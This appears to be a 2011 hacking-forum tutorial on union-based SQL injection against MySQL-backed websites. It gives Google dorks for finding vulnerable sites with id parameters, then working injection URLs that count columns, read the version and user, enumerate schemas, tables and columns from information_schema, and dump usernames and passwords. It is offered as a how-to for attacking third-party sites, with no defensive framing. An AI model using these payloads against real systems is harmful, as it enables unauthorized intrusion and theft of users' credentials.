SQL injection Tutorial

SQL injection Tutorial

  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting mysql version current user
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords



1. Finding vulnerable sites


To find Vulnerable sites you are going to use Google Dorks.
Some common dorks are:

Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

You can read my tutorial on how to use SQL injection scanner called "SQL Poizon":

http://www.hackforums.net/showthread.php?tid=1124572

lets say you got this site:
Code:
http://site.com/news/view.php?id=828
if we add a ' before or after the numbers it should look something like this if its vulnerable:

[Image: sqlitut1.jpg]

2. Finding amount of columns


To find the right amound of columns we are using "order by". here is how it works:

Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)

This means or site has 8 columns and we will now move over to "union select".

This is how it works:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--

Note the hyphen - before the numbers!

This should make the website to show some numbers on the screen like this:

[Image: sqlitut2.jpg]

This meens its absolutly sure that the site is vulnerable to sql injection.

3. Getting MySQL version and Current User


Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).

Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--

[Image: sqlitut3.jpg]

To get the Current user you type this:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--

This should display:

[Image: sqlitut4.jpg]

4. Getting Databases


Now we wanna find the databases and the Current database.
Here the syntax for all databases:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

It should displays something like this:

[Image: sqlitut5.jpg]

Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.

Syntax for current database:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8

This should display something like this:

[Image: sqlitut6.jpg]

5. Getting Tables


Now we want to know the tables on in the database and for this we will conintue using "union select".

Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

This should display something like this:

[Image: sqlitut7.jpg]

We now know that the table that passwords should be stored in are called bpusers, write it down and move on.

6. Getting Columns


Now we want to know the columns.

Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

This should display something like this:

[Image: sqlitut8.jpg]

7. Dumping users/pass


Now you would like to dump logins and passwords from bpusers.

Here is the code for thath:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

This would display something like this:

[Image: sqlitut9.jpg]

(NOTE: 0x3a will make a : between logins and passwords.)

You have now performed a SQL injection attack.

I have worked hard on this, please don't leech it.

If you do, give credits to me.


© Copyright Join7 2011

-
Cowards die many times before their deaths